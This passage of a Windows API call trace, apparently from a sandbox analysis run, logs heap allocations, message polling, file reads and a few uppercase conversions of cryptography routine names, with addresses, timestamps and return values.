(HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0175.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0175.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0175.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0175.317] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0175.317] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0175.322] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x5694, lpOverlapped=0x0) returned 1 [0175.323] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0175.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15694) returned 0xa7f018 [0175.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0175.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0175.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15694) returned 0x9c5180 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.328] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15694) returned 0xa7f018 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.328] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0175.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0175.329] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.329] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0175.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15694) returned 0xa7f018 [0175.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0175.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0175.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0175.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0175.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0175.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15694) returned 0x9da820 [0175.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0175.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0175.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0175.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0175.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0175.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0175.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0175.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0175.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0175.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.333] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0175.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2718 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0175.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0175.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.333] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0175.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.334] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0175.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.335] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0175.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0175.336] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0175.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0175.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0175.337] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.337] HeapFree (in: 